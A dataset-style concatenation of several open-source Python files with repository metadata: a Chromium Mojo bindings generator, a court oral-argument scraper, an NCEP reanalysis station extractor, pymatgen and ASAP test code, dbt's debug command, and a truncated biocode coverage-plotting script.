7b21ec5046d4f0d483c242e6f9db84f001a9c710c7f33502b697e2990ad1ece0
|
#!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""The frontend for the Mojo bindings system."""
import argparse
import imp
import os
import pprint
import sys
script_dir = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(0, os.path.join(script_dir, "pylib"))
from generate import mojom_data
from parse import mojo_parser
from parse import mojo_translate
def LoadGenerators(generators_string):
if not generators_string:
return [] # No generators.
generators = []
for generator_name in [s.strip() for s in generators_string.split(",")]:
# "Built-in" generators:
if generator_name.lower() == "c++":
generator_name = os.path.join(script_dir, "generators",
"mojom_cpp_generator.py")
elif generator_name.lower() == "javascript":
generator_name = os.path.join(script_dir, "generators",
"mojom_js_generator.py")
# Specified generator python module:
elif generator_name.endswith(".py"):
pass
else:
print "Unknown generator name %s" % generator_name
sys.exit(1)
generator_module = imp.load_source(os.path.basename(generator_name)[:-3],
generator_name)
generators.append(generator_module)
return generators
def ProcessFile(args, generator_modules, filename, processed_files):
# Ensure we only visit each file once.
if filename in processed_files:
if processed_files[filename] is None:
raise Exception("Circular dependency: " + filename)
return processed_files[filename]
processed_files[filename] = None
dirname, name = os.path.split(filename)
# TODO(darin): There's clearly too many layers of translation here! We can
# at least avoid generating the serialized Mojom IR.
tree = mojo_parser.Parse(filename)
mojom = mojo_translate.Translate(tree, name)
if args.debug_print_intermediate:
pprint.PrettyPrinter().pprint(mojom)
# Process all our imports first and collect the module object for each.
# We use these to generate proper type info.
for import_data in mojom['imports']:
import_filename = os.path.join(dirname, import_data['filename'])
import_data['module'] = ProcessFile(
args, generator_modules, import_filename, processed_files)
module = mojom_data.OrderedModuleFromData(mojom)
# Set the path as relative to the source root.
module.path = os.path.relpath(os.path.abspath(filename),
os.path.abspath(args.depth))
# Normalize to unix-style path here to keep the generators simpler.
module.path = module.path.replace('\\', '/')
for generator_module in generator_modules:
generator = generator_module.Generator(module, args.output_dir)
generator.GenerateFiles()
processed_files[filename] = module
return module
def Main():
parser = argparse.ArgumentParser(
description="Generate bindings from mojom files.")
parser.add_argument("filename", nargs="+",
help="mojom input file")
parser.add_argument("-d", "--depth", dest="depth", default=".",
help="depth from source root")
parser.add_argument("-o", "--output_dir", dest="output_dir", default=".",
help="output directory for generated files")
parser.add_argument("-g", "--generators", dest="generators_string",
metavar="GENERATORS", default="c++,javascript",
help="comma-separated list of generators")
parser.add_argument("--debug_print_intermediate", action="store_true",
help="print the intermediate representation")
args = parser.parse_args()
generator_modules = LoadGenerators(args.generators_string)
if not os.path.exists(args.output_dir):
os.makedirs(args.output_dir)
for filename in args.filename:
ProcessFile(args, generator_modules, filename, {})
return 0
if __name__ == "__main__":
sys.exit(Main())
|
anirudhSK/chromium
|
mojo/public/bindings/mojom_bindings_generator.py
|
Python
|
bsd-3-clause
| 4,091
|
[
"VisIt"
] |
22451d564fca7ab3d0ac36305095b234eaf345299fc379c801c5e58905572bb0
|
"""Oral Argument Audio Scraper for Eighth Circuit Court of Appeals
CourtID: ca8
Court Short Name: 8th Cir.
Author: Brian W. Carver
Date created: 2014-06-21
History:
- 2014-07-22: download_url fixed by mlr
"""
from datetime import datetime
from juriscraper.OralArgumentSite import OralArgumentSite
class Site(OralArgumentSite):
def __init__(self, *args, **kwargs):
super(Site, self).__init__(*args, **kwargs)
self.court_id = self.__module__
self.url = 'http://media-oa.ca8.uscourts.gov/circ8rss.xml'
def _download(self, request_dict={}):
"""Go through the items and filter out ones that aren't complete.
"""
self.items = []
html_tree = super(Site, self)._download(request_dict=request_dict)
for item in html_tree.xpath('//item'):
case_name = item.xpath('./title/text()')[0].split(":", 1)[1]
if case_name.strip():
self.items.append(item)
# Set self.html to None so it can't be misused.
return None
def _get_download_urls(self):
return [item.xpath('//enclosure/@url')[0] for item in self.items]
def _get_case_names(self):
case_names = []
for txt in [item.xpath('./title/text()')[0] for item in self.items]:
case_name = txt.split(': ', 1)[1]
case_names.append(case_name)
return case_names
def _get_case_dates(self):
case_dates = []
for txt in [item.xpath('./description/text()')[0] for item in self.items]:
# I can't see it, but there's apparently whitespace or a newline
# at the end of these dates that has to be removed or we error out.
case_date = txt.split('about ', 1)[1].strip()
case_dates.append(datetime.strptime(case_date, '%m/%d/%Y').date())
return case_dates
def _get_docket_numbers(self):
docket_numbers = []
for txt in [item.xpath('./title/text()')[0] for item in self.items]:
docket_number = txt.split(': ', 1)[0]
docket_numbers.append(docket_number)
return docket_numbers
|
Andr3iC/juriscraper
|
oral_args/united_states/federal_appellate/ca8.py
|
Python
|
bsd-2-clause
| 2,115
|
[
"Brian"
] |
f586af308ededdbdae13ed25fb26cb629be5b107192ce45c7033086d4a833a4a
|
#!/usr/bin/env
"""
HROISST_Station.py
Retrieve NCEP HighRes OI SST for defined station:
Save in EPIC NetCDF standard
Modified 2016-12-06: Use sbell unified package subroutines for netcdf/time - cleanup code
"""
#System Stack
import datetime
import sys
import argparse
#Science Stack
import numpy as np
from netCDF4 import Dataset
# Visual Stack
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap, shiftgrid
# User Stack
from calc import haversine as sphered
from io_utils.EcoFOCI_netCDF_read import EcoFOCI_netCDF
from calc.EPIC2Datetime import EPIC2Datetime, to_UDUNITS, Datetime2EPIC
from utilities import ncutilities as ncutil
__author__ = 'Shaun Bell'
__email__ = 'shaun.bell@noaa.gov'
__created__ = datetime.datetime(2014, 01, 13)
__modified__ = datetime.datetime(2014, 01, 13)
__version__ = "0.1.0"
__status__ = "Development"
__keywords__ = 'NCEP','Unimak', 'Shumagin','3hr filtered', 'U,V','Winds', 'Gulf of Alaska'
"""------------------------EPIC Write Modules-------------------------------------------"""
def write2epic( file_name, stationid, time, lat_lon, data ):
ncinstance = ncutil.EPIC_NC(savefile=file_name)
ncinstance.file_create()
ncinstance.sbeglobal_atts(DATA_CMNT='NCEP NCAR Reanalysis')
ncinstance.PMELglobal_atts(Station_Name=stationid, file_name=( __file__.split('/')[-1]) )
ncinstance.dimension_init(len_time=len(time[0]))
ncinstance.variable_init()
ncinstance.add_coord_data(time1=time[0], time2=time[1], latitude=lat_lon[0], longitude=-1 * lat_lon[1], \
depth_level=0. )
ncinstance.add_data('WU_422', data[0])
ncinstance.add_data('WV_423', data[1])
ncinstance.add_data('AT_21', data[2])
ncinstance.close()
def write2epic_cf( file_name, stationid, time, lat_lon, data ):
ncinstance = ncutil.EPIC_NC_cf(savefile=file_name)
ncinstance.file_create()
ncinstance.sbeglobal_atts(DATA_CMNT='NCEP NCAR Reanalysis')
ncinstance.PMELglobal_atts(Station_Name=stationid, file_name=( __file__.split('/')[-1]) )
ncinstance.dimension_init(len_time=len(time))
ncinstance.variable_init()
ncinstance.add_coord_data(time=time, latitude=lat_lon[0], longitude=-1 * lat_lon[1], \
depth_level=0. )
ncinstance.add_data('WU_422', data[0])
ncinstance.add_data('WV_423', data[1])
ncinstance.add_data('AT_21', data[2])
ncinstance.close()
"""------------------------- Topo Modules -------------------------------------------"""
def etopo5_data():
""" read in etopo5 topography/bathymetry. """
file = '/Users/bell/in_and_outbox/Ongoing_Analysis/MapGrids/etopo5.nc'
etopodata = Dataset(file)
topoin = etopodata.variables['bath'][:]
lons = etopodata.variables['X'][:]
lats = etopodata.variables['Y'][:]
etopodata.close()
topoin,lons = shiftgrid(0.,topoin,lons,start=False) # -360 -> 0
lons, lats = np.meshgrid(lons, lats)
return(topoin, lats, lons)
"""------------------------- Main Modules -------------------------------------------"""
parser = argparse.ArgumentParser(description='NCEPHROISST from Single Station')
parser.add_argument('MooringID', metavar='MooringID', type=str, help='MooringID Name')
parser.add_argument('latitude', metavar='latitude', type=float, help='latitude (+N)')
parser.add_argument('longitude', metavar='longitude', type=float, help='longitude (+W)')
parser.add_argument('years', nargs='+', type=int, help='start and stop year')
parser.add_argument('--DataPath', metavar='DataPath', type=str, help='full path to alternate file')
parser.add_argument("-scf",'--store_cf', action="store_true", help='cf conventions - primarily in time')
parser.add_argument("-sep",'--store_epic', action="store_true", help='epic conventions - primarily in time')
parser.add_argument("-plot",'--plot', action="store_true", help='create plot of location')
args = parser.parse_args()
####### CMD Line Parse
### CMD Line User defined Station parameters
station_name = [args.MooringID]
sta_lat = [args.latitude]
sta_long = [args.longitude]
### Hard coded path
if args.DataPath:
NCEP = args.DataPath
else:
NARR = '/Users/bell/Data_Local/Reanalysis_Files/NCEP-NCAR/daily/'
infile = [NCEP + 'uwnd.10m.gauss.2019.nc']
print infile
#################
### Grab grid points for future slicing
# - assume grid is same in all model output
df = EcoFOCI_netCDF(infile[0])
vars_dic = df.get_vars()
nchandle = df._getnchandle_()
lat_lon = {}
for j, v in enumerate(['lat', 'lon']):
lat_lon[v] = nchandle.variables[v][:]
df.close()
### Find model points
#Find NCEP nearest point to moorings - haversine formula
# NCEP data is 0->360 (positive east), Moorings are usually expressed +W for FOCI
stn1_pt = sphered.nearest_point([sta_lat[0],-1 * sta_long[0]],lat_lon['lat'],lat_lon['lon'], '1d')
stn1_modelpt = [lat_lon['lat'][stn1_pt[3]],lat_lon['lon'][stn1_pt[4]]]
print "stn1 nearest point to {sta_lat}, {sta_lon} which is lat:{sta_modellat} , lon:{sta_modellon}".format(
sta_lat=sta_lat[0], sta_lon=sta_long[0],
sta_modellat=stn1_modelpt[0], sta_modellon=stn1_modelpt[1])
stn1_modelpt[1] = -1.*((180 - stn1_modelpt[1]) + 180)
print "thus converting lon to degrees W negative {sta_modellon}".format(sta_modellon=stn1_modelpt[1])
#loop over all requested data
years = range(args.years[0],args.years[1]+1)
for yy in years:
# retrieve only these location's data
### uwnd files
infile = NCEP + 'uwnd.10m.gauss.'+ str(yy) + '.nc'
print "Working on file " + infile
df = EcoFOCI_netCDF(infile)
vars_dic = df.get_vars()
nchandle = df._getnchandle_()
print "Parameters availabile: {params}".format(params=vars_dic.keys())
stn1_data = {}
for j, v in enumerate(vars_dic):
try: #check for nc variable
stn1_data[v] = nchandle.variables[v][:,stn1_pt[3], stn1_pt[4]]
except ValueError: #if parameter is not of expected dimensions
stn1_data[v] = nchandle.variables[v][:]
stn1_uwnd = stn1_data['uwnd']
df.close()
### vwind files
infile = NCEP + 'vwnd.10m.gauss.'+ str(yy) + '.nc'
print "Working on file " + infile
df = EcoFOCI_netCDF(infile)
vars_dic = df.get_vars()
nchandle = df._getnchandle_()
print "Parameters availabile: {params}".format(params=vars_dic.keys())
stn1_data = {}
for j, v in enumerate(vars_dic):
try: #check for nc variable
stn1_data[v] = nchandle.variables[v][:,stn1_pt[3], stn1_pt[4]]
except ValueError: #if parameter is not of expected dimensions
stn1_data[v] = nchandle.variables[v][:]
stn1_vwind = stn1_data['vwnd']
df.close()
### air files
infile = NCEP + 'air.2m.gauss.'+ str(yy) + '.nc'
print "Working on file " + infile
df = EcoFOCI_netCDF(infile)
vars_dic = df.get_vars()
nchandle = df._getnchandle_()
print "Parameters availabile: {params}".format(params=vars_dic.keys())
stn1_data = {}
for j, v in enumerate(vars_dic):
try: #check for nc variable
stn1_data[v] = nchandle.variables[v][:,stn1_pt[3], stn1_pt[4]]
except ValueError: #if parameter is not of expected dimensions
stn1_data[v] = nchandle.variables[v][:]
stn1_2mair = stn1_data['air'] - 273.15
df.close()
#convert to EPIC time
pydate = to_UDUNITS(stn1_data['time'],
time_since_str='hours since 1800-01-01 00:00:00')
epic_time, epic_time1 = Datetime2EPIC(pydate.tolist())
if args.store_epic:
# write to NetCDF
outfile = 'data/NCEPNCAR_' + args.MooringID + '_' + str(yy) + '.nc'
print "Writing to Epic NetCDF " + outfile
write2epic( outfile, station_name[0], [epic_time, epic_time1], stn1_modelpt, [stn1_uwnd,stn1_vwind,stn1_2mair])
if args.store_cf:
# write to NetCDF
outfile = 'data/NCEPNCAR_' + args.MooringID + '_' + str(yy) + '_cf.nc'
print "Writing to Epic NetCDF " + outfile
write2epic_cf( outfile, station_name[0], stn1_data['time'], stn1_modelpt, [stn1_uwnd,stn1_vwind,stn1_2mair])
if args.plot:
(topoin, elats, elons) = etopo5_data()
fig = plt.figure()
ax = plt.subplot(111)
m = Basemap(resolution='i',projection='merc', llcrnrlat=45,
urcrnrlat=65,llcrnrlon=-180,urcrnrlon=-155, lat_ts=60)
# Mooring Data
x_moor, y_moor = m(-1. * sta_long[0],sta_lat[0])
x_close, y_close = m(stn1_modelpt[1], stn1_modelpt[0])
#ETOPO 5 contour data
ex, ey = m(elons, elats)
CS = m.contourf(ex,ey,topoin, levels=range(250,5000,250), cmap='gray_r', alpha=.75) #colors='black'
CS = m.contour(ex,ey,topoin, levels=range(250,5000,250), linewidths=0.2, colors='black', alpha=.75) #
CS = m.contour(ex,ey,topoin, levels=[-1000, -200, -100], linestyle='--', linewidths=0.2, colors='black', alpha=.75) #
#plot points
m.scatter(x_close,y_close,20,marker='+',color='b')
m.scatter(x_moor,y_moor,20,marker='o',color='g')
m.drawcountries(linewidth=0.5)
m.drawcoastlines(linewidth=0.5)
m.drawparallels(np.arange(55,75,5.),labels=[1,0,0,0],color='black',dashes=[1,1],labelstyle='+/-',linewidth=0.2) # draw parallels
m.drawmeridians(np.arange(-180,-145,5.),labels=[0,0,0,1],color='black',dashes=[1,1],labelstyle='+/-',linewidth=0.2) # draw meridians
#m.fillcontinents(color='black')
DefaultSize = fig.get_size_inches()
fig.set_size_inches( (DefaultSize[0], DefaultSize[1]) )
plt.savefig('images/'+args.MooringID+'.png', bbox_inches='tight', dpi = (100))
plt.close()
|
shaunwbell/FOCI_Analysis
|
NCEP_WindsSFCtemp_Station.py
|
Python
|
mit
| 9,719
|
[
"NetCDF"
] |
3cf9a8a82c81b86847b9445a78b247ca14367720d0b49ead7683eee4e2b859b5
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import unicode_literals
import unittest
import tempfile
import numpy.testing.utils as nptu
from six.moves import zip
from io import open
import os
import json
from monty.json import MontyDecoder
from monty.serialization import loadfn
from monty.json import MSONable
from monty.dev import requires
from pymatgen import SETTINGS, MPRester
"""
Common test support for pymatgen test scripts.
This single module should provide all the common functionality for pymatgen
tests in a single location, so that test scripts can just import it and work
right away.
"""
class PymatgenTest(unittest.TestCase):
"""
Extends unittest.TestCase with functions (taken from numpy.testing.utils)
that support the comparison of arrays.
"""
MODULE_DIR = os.path.dirname(os.path.abspath(__file__))
STRUCTURES_DIR = os.path.join(MODULE_DIR, "structures")
"""
Dict for test structures to aid testing.
"""
TEST_STRUCTURES = {}
for fn in os.listdir(STRUCTURES_DIR):
TEST_STRUCTURES[fn.rsplit(".", 1)[0]] = loadfn(os.path.join(
STRUCTURES_DIR, fn), cls=MontyDecoder)
@classmethod
def get_structure(cls, name):
return cls.TEST_STRUCTURES[name].copy()
@classmethod
@requires(SETTINGS.get("PMG_MAPI_KEY"), "PMG_MAPI_KEY needs to be set.")
def get_mp_structure(cls, mpid):
m = MPRester()
return m.get_structure_by_material_id(mpid)
@staticmethod
def assertArrayAlmostEqual(actual, desired, decimal=7, err_msg='',
verbose=True):
"""
Tests if two arrays are almost equal to a tolerance. The CamelCase
naming is so that it is consistent with standard unittest methods.
"""
return nptu.assert_almost_equal(actual, desired, decimal, err_msg,
verbose)
@staticmethod
def assertArrayEqual(actual, desired, err_msg='', verbose=True):
"""
Tests if two arrays are equal. The CamelCase naming is so that it is
consistent with standard unittest methods.
"""
return nptu.assert_equal(actual, desired, err_msg=err_msg,
verbose=verbose)
def serialize_with_pickle(self, objects, protocols=None, test_eq=True):
"""
Test whether the object(s) can be serialized and deserialized with
pickle. This method tries to serialize the objects with pickle and the
protocols specified in input. Then it deserializes the pickle format
and compares the two objects with the __eq__ operator if
test_eq == True.
Args:
objects: Object or list of objects.
protocols: List of pickle protocols to test. If protocols is None,
HIGHEST_PROTOCOL is tested.
Returns:
Nested list with the objects deserialized with the specified
protocols.
"""
# Use the python version so that we get the traceback in case of errors
import pickle as pickle
from pymatgen.serializers.pickle_coders import pmg_pickle_load, \
pmg_pickle_dump
# Build a list even when we receive a single object.
got_single_object = False
if not isinstance(objects, (list, tuple)):
got_single_object = True
objects = [objects]
if protocols is None:
# protocols = set([0, 1, 2] + [pickle.HIGHEST_PROTOCOL])
protocols = [pickle.HIGHEST_PROTOCOL]
# This list will contains the object deserialized with the different
# protocols.
objects_by_protocol, errors = [], []
for protocol in protocols:
# Serialize and deserialize the object.
mode = "wb"
fd, tmpfile = tempfile.mkstemp(text="b" not in mode)
try:
with open(tmpfile, mode) as fh:
pmg_pickle_dump(objects, fh, protocol=protocol)
except Exception as exc:
errors.append("pickle.dump with protocol %s raised:\n%s" %
(protocol, str(exc)))
continue
try:
with open(tmpfile, "rb") as fh:
new_objects = pmg_pickle_load(fh)
except Exception as exc:
errors.append("pickle.load with protocol %s raised:\n%s" %
(protocol, str(exc)))
continue
# Test for equality
if test_eq:
for old_obj, new_obj in zip(objects, new_objects):
self.assertEqual(old_obj, new_obj)
# Save the deserialized objects and test for equality.
objects_by_protocol.append(new_objects)
if errors:
raise ValueError("\n".join(errors))
# Return nested list so that client code can perform additional tests.
if got_single_object:
return [o[0] for o in objects_by_protocol]
else:
return objects_by_protocol
def tmpfile_write(self, string):
"""
Write string to a temporary file. Returns the name of the temporary
file.
"""
fd, tmpfile = tempfile.mkstemp(text=True)
with open(tmpfile, "w") as fh:
fh.write(string)
return tmpfile
def assertMSONable(self, obj, test_if_subclass=True):
"""
Tests if obj is MSONable and tries to verify whether the contract is
fulfilled.
By default, the method tests whether obj is an instance of MSONable.
This check can be deactivated by setting test_if_subclass to False.
"""
if test_if_subclass:
self.assertIsInstance(obj, MSONable)
self.assertDictEqual(obj.as_dict(), obj.__class__.from_dict(
obj.as_dict()).as_dict())
json.loads(obj.to_json(), cls=MontyDecoder)
|
xhqu1981/pymatgen
|
pymatgen/util/testing.py
|
Python
|
mit
| 6,039
|
[
"pymatgen"
] |
5978bd4d39eb24576b9d6c4c573d10908c2677e2ffb758bed0e72c222fe8faa7
|
# coding=utf-8
import os
import platform
import sys
from typing import Optional, Dict, Any, List
from dbt.logger import GLOBAL_LOGGER as logger
import dbt.clients.system
import dbt.config
import dbt.utils
import dbt.exceptions
from dbt.links import ProfileConfigDocs
from dbt.adapters.factory import get_adapter, register_adapter
from dbt.version import get_installed_version
from dbt.config import Project, Profile
from dbt.config.renderer import DbtProjectYamlRenderer, ProfileRenderer
from dbt.context.base import generate_base_context
from dbt.context.target import generate_target_context
from dbt.clients.yaml_helper import load_yaml_text
from dbt.ui.printer import green, red
from dbt.task.base import BaseTask, get_nearest_project_dir
PROFILE_DIR_MESSAGE = """To view your profiles.yml file, run:
{open_cmd} {profiles_dir}"""
ONLY_PROFILE_MESSAGE = '''
A `dbt_project.yml` file was not found in this directory.
Using the only profile `{}`.
'''.lstrip()
MULTIPLE_PROFILE_MESSAGE = '''
A `dbt_project.yml` file was not found in this directory.
dbt found the following profiles:
{}
To debug one of these profiles, run:
dbt debug --profile [profile-name]
'''.lstrip()
COULD_NOT_CONNECT_MESSAGE = '''
dbt was unable to connect to the specified database.
The database returned the following error:
>{err}
Check your database credentials and try again. For more information, visit:
{url}
'''.lstrip()
MISSING_PROFILE_MESSAGE = '''
dbt looked for a profiles.yml file in {path}, but did
not find one. For more information on configuring your profile, consult the
documentation:
{url}
'''.lstrip()
FILE_NOT_FOUND = 'file not found'
class QueryCommentedProfile(Profile):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.query_comment = None
class DebugTask(BaseTask):
def __init__(self, args, config):
super().__init__(args, config)
self.profiles_dir = getattr(self.args, 'profiles_dir',
dbt.config.PROFILES_DIR)
self.profile_path = os.path.join(self.profiles_dir, 'profiles.yml')
try:
self.project_dir = get_nearest_project_dir(self.args)
except dbt.exceptions.Exception:
# we probably couldn't find a project directory. Set project dir
# to whatever was given, or default to the current directory.
if args.project_dir:
self.project_dir = args.project_dir
else:
self.project_dir = os.getcwd()
self.project_path = os.path.join(self.project_dir, 'dbt_project.yml')
self.cli_vars = dbt.utils.parse_cli_vars(
getattr(self.args, 'vars', '{}')
)
# set by _load_*
self.profile: Optional[Profile] = None
self.profile_fail_details = ''
self.raw_profile_data: Optional[Dict[str, Any]] = None
self.profile_name: Optional[str] = None
self.project: Optional[Project] = None
self.project_fail_details = ''
self.messages: List[str] = []
@property
def project_profile(self):
if self.project is None:
return None
return self.project.profile_name
def path_info(self):
open_cmd = dbt.clients.system.open_dir_cmd()
message = PROFILE_DIR_MESSAGE.format(
open_cmd=open_cmd,
profiles_dir=self.profiles_dir
)
logger.info(message)
def run(self):
if self.args.config_dir:
self.path_info()
return
version = get_installed_version().to_version_string(skip_matcher=True)
print('dbt version: {}'.format(version))
print('python version: {}'.format(sys.version.split()[0]))
print('python path: {}'.format(sys.executable))
print('os info: {}'.format(platform.platform()))
print('Using profiles.yml file at {}'.format(self.profile_path))
print('Using dbt_project.yml file at {}'.format(self.project_path))
print('')
self.test_configuration()
self.test_dependencies()
self.test_connection()
for message in self.messages:
print(message)
print('')
def _load_project(self):
if not os.path.exists(self.project_path):
self.project_fail_details = FILE_NOT_FOUND
return red('ERROR not found')
if self.profile is None:
ctx = generate_base_context(self.cli_vars)
else:
ctx = generate_target_context(self.profile, self.cli_vars)
renderer = DbtProjectYamlRenderer(ctx)
try:
self.project = Project.from_project_root(
self.project_dir, renderer
)
except dbt.exceptions.DbtConfigError as exc:
self.project_fail_details = str(exc)
return red('ERROR invalid')
return green('OK found and valid')
def _profile_found(self):
if not self.raw_profile_data:
return red('ERROR not found')
assert self.raw_profile_data is not None
if self.profile_name in self.raw_profile_data:
return green('OK found')
else:
return red('ERROR not found')
def _target_found(self):
requirements = (self.raw_profile_data and self.profile_name and
self.target_name)
if not requirements:
return red('ERROR not found')
# mypy appeasement, we checked just above
assert self.raw_profile_data is not None
assert self.profile_name is not None
assert self.target_name is not None
if self.profile_name not in self.raw_profile_data:
return red('ERROR not found')
profiles = self.raw_profile_data[self.profile_name]['outputs']
if self.target_name not in profiles:
return red('ERROR not found')
return green('OK found')
def _choose_profile_names(self) -> Optional[List[str]]:
project_profile: Optional[str] = None
if os.path.exists(self.project_path):
try:
partial = Project.partial_load(
os.path.dirname(self.project_path)
)
renderer = DbtProjectYamlRenderer(
generate_base_context(self.cli_vars)
)
project_profile = partial.render_profile_name(renderer)
except dbt.exceptions.DbtProjectError:
pass
args_profile: Optional[str] = getattr(self.args, 'profile', None)
try:
return [Profile.pick_profile_name(args_profile, project_profile)]
except dbt.exceptions.DbtConfigError:
pass
# try to guess
profiles = []
if self.raw_profile_data:
profiles = [k for k in self.raw_profile_data if k != 'config']
if project_profile is None:
self.messages.append('Could not load dbt_project.yml')
elif len(profiles) == 0:
self.messages.append('The profiles.yml has no profiles')
elif len(profiles) == 1:
self.messages.append(ONLY_PROFILE_MESSAGE.format(profiles[0]))
else:
self.messages.append(MULTIPLE_PROFILE_MESSAGE.format(
'\n'.join(' - {}'.format(o) for o in profiles)
))
return profiles
def _choose_target_name(self, profile_name: str):
has_raw_profile = (
self.raw_profile_data is not None and
profile_name in self.raw_profile_data
)
if not has_raw_profile:
return None
# mypy appeasement, we checked just above
assert self.raw_profile_data is not None
raw_profile = self.raw_profile_data[profile_name]
renderer = ProfileRenderer(generate_base_context(self.cli_vars))
target_name, _ = Profile.render_profile(
raw_profile=raw_profile,
profile_name=profile_name,
target_override=getattr(self.args, 'target', None),
renderer=renderer
)
return target_name
def _load_profile(self):
if not os.path.exists(self.profile_path):
self.profile_fail_details = FILE_NOT_FOUND
self.messages.append(MISSING_PROFILE_MESSAGE.format(
path=self.profile_path, url=ProfileConfigDocs
))
return red('ERROR not found')
try:
raw_profile_data = load_yaml_text(
dbt.clients.system.load_file_contents(self.profile_path)
)
except Exception:
pass # we'll report this when we try to load the profile for real
else:
if isinstance(raw_profile_data, dict):
self.raw_profile_data = raw_profile_data
profile_errors = []
profile_names = self._choose_profile_names()
renderer = ProfileRenderer(generate_base_context(self.cli_vars))
for profile_name in profile_names:
try:
profile: Profile = QueryCommentedProfile.render_from_args(
self.args, renderer, profile_name
)
except dbt.exceptions.DbtConfigError as exc:
profile_errors.append(str(exc))
else:
if len(profile_names) == 1:
# if a profile was specified, set it on the task
self.target_name = self._choose_target_name(profile_name)
self.profile = profile
if profile_errors:
self.profile_fail_details = '\n\n'.join(profile_errors)
return red('ERROR invalid')
return green('OK found and valid')
def test_git(self):
try:
dbt.clients.system.run_cmd(os.getcwd(), ['git', '--help'])
except dbt.exceptions.ExecutableError as exc:
self.messages.append('Error from git --help: {!s}'.format(exc))
return red('ERROR')
return green('OK found')
def test_dependencies(self):
print('Required dependencies:')
print(' - git [{}]'.format(self.test_git()))
print('')
def test_configuration(self):
profile_status = self._load_profile()
project_status = self._load_project()
print('Configuration:')
print(' profiles.yml file [{}]'.format(profile_status))
print(' dbt_project.yml file [{}]'.format(project_status))
# skip profile stuff if we can't find a profile name
if self.profile_name is not None:
print(' profile: {} [{}]'.format(self.profile_name,
self._profile_found()))
print(' target: {} [{}]'.format(self.target_name,
self._target_found()))
print('')
self._log_project_fail()
self._log_profile_fail()
def _log_project_fail(self):
if not self.project_fail_details:
return
if self.project_fail_details == FILE_NOT_FOUND:
return
print('Project loading failed for the following reason:')
print(self.project_fail_details)
print('')
def _log_profile_fail(self):
if not self.profile_fail_details:
return
if self.profile_fail_details == FILE_NOT_FOUND:
return
print('Profile loading failed for the following reason:')
print(self.profile_fail_details)
print('')
@staticmethod
def attempt_connection(profile):
"""Return a string containing the error message, or None if there was
no error.
"""
register_adapter(profile)
adapter = get_adapter(profile)
try:
with adapter.connection_named('debug'):
adapter.execute('select 1 as id')
except Exception as exc:
return COULD_NOT_CONNECT_MESSAGE.format(
err=str(exc),
url=ProfileConfigDocs,
)
return None
def _connection_result(self):
result = self.attempt_connection(self.profile)
if result is not None:
self.messages.append(result)
return red('ERROR')
return green('OK connection ok')
def test_connection(self):
if not self.profile:
return
print('Connection:')
for k, v in self.profile.credentials.connection_info():
print(' {}: {}'.format(k, v))
print(' Connection test: {}'.format(self._connection_result()))
print('')
@classmethod
def validate_connection(cls, target_dict):
"""Validate a connection dictionary. On error, raises a DbtConfigError.
"""
target_name = 'test'
# make a fake profile that we can parse
profile_data = {
'outputs': {
target_name: target_dict,
},
}
# this will raise a DbtConfigError on failure
profile = Profile.from_raw_profile_info(
raw_profile=profile_data,
profile_name='',
target_override=target_name,
renderer=ProfileRenderer(generate_base_context({})),
)
result = cls.attempt_connection(profile)
if result is not None:
raise dbt.exceptions.DbtProfileError(
result,
result_type='connection_failure'
)
|
fishtown-analytics/dbt
|
core/dbt/task/debug.py
|
Python
|
apache-2.0
| 13,454
|
[
"VisIt"
] |
7e41cb858ae5701931a0d58e107395eebe2841911ee75f6803b5082f8583491d
|
# Checks for Ticket #11
from asap3 import *
from ase.lattice.cubic import FaceCenteredCubic
from asap3.testtools import ReportTest
print "Test for Ticket #11: https://trac.fysik.dtu.dk/projects/Asap/ticket/11"
atoms = FaceCenteredCubic(directions=[[1,0,0],[0,1,0],[0,0,1]], size=(6,6,6),
symbol="Cu")
atoms.set_calculator(EMT())
r = atoms.get_positions()
print "Orig position", r[-1]
uc = atoms.get_cell()
print uc
r[-1] = 1.51*uc[2]
atoms.set_positions(r)
print atoms.get_potential_energy()
p1 = atoms.get_positions()[-1]
print "p1:", p1
atoms.set_cell(uc, scale_atoms=True)
print atoms.get_potential_energy()
p2 = atoms.get_positions()[-1]
print "p2:", p2
atoms.set_cell(uc, scale_atoms=False)
print atoms.get_potential_energy()
p3 = atoms.get_positions()[-1]
print "p3:", p3
ReportTest("p2 equals p1", p2[2], p1[2], 1e-6)
ReportTest("p3 equals p1", p3[2], p1[2], 1e-6)
ReportTest.Summary()
|
auag92/n2dm
|
Asap-3.8.4/Test/ChangeUnitCell.py
|
Python
|
mit
| 928
|
[
"ASE"
] |
0947e0e963651d954137b9169afb870bda0f5318f585965230522569026e83ff
|
#!/usr/bin/env python3
"""
INPUT
Expected input file format (pileup):
Each line consists of 5 (or optionally 6) tab-separated columns:
1. Sequence identifier
2. Position in sequence (starting from 1)
3. Reference nucleotide at that position
4. Number of aligned reads covering that position (depth of coverage)
5. Bases at that position from aligned reads
6. Quality of those bases (OPTIONAL)
In my testing, this was generated like this:
samtools mpileup -f Trinity.fasta XUMTA_20131112.bowtie.sorted.mappedonly.bam > XUMTA_20131112.bowtie.sorted.mappedonly.mpileup
OUTPUT
The X and Y size of the resulting image is going to be a product of the --mol_size_limit and --mol_bin_size
parameters.
If you pass a value of 'plot' to the -o parameter it will invoke the interactive plot viewer rather
than writing an output file. (You can still save a file from within the viewer)
"""
import argparse
import numpy as np
from collections import defaultdict
import matplotlib.pyplot as plt
from biocode import utils
def main():
parser = argparse.ArgumentParser( description='Generates a figure showing coverage/abundance vs. molecule size.')
## output file to be written
parser.add_argument('-i', '--input_file', type=str, required=True, help='Path to an input pileup file' )
parser.add_argument('-f', '--fasta_file', type=str, required=True, help='Path to the FASTA file of reference molecules' )
parser.add_argument('-o', '--output_file', type=str, required=True, help='Path to an output file to be created' )
parser.add_argument('-s', '--mol_size_limit', type=int, required=False, default=5000, help='Results for molecules over this size will be grouped together' )
parser.add_argument('-b', '--mol_bin_size', type=int, required=False, default=10, help='Set the binning resolution of the transcript size axis')
args = parser.parse_args()
## first, we need a collection of the FASTA data and the molecule lengths
molecules = utils.fasta_dict_from_file(args.fasta_file)
## data points for plotting
# structure like this:
# 500 = { 30 => 2 }
# which means: There were 2 transcripts with median coverage of 30 and length between 500 and 500+mol_bin_size
data_bins = defaultdict(lambda: defaultdict(int))
current_molecule_id = None
current_molecule_coverages = list()
